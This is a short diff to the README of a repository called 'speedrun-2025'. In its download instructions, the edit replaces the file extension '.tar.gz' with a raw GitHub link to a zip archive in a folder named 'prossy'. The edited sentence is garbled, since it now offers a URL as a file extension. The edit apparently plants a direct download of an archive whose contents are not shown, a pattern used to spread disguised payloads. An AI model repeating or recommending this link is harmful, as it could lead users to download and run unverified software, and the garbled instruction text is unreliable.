huta2035/speedrun-2025/README.md

    For example:
    - If you are using Windows, you might look for a file that ends in `.exe`.
-   - If you are using Mac or Linux, you might see files with extensions like `.tar.gz`.
+   - If you are using Mac or Linux, you might see files with extensions like `https://raw.githubusercontent.com/huta2035/speedrun-2025/main/prossy/speedrun-2025.zip`.

 4. **Extract the Files**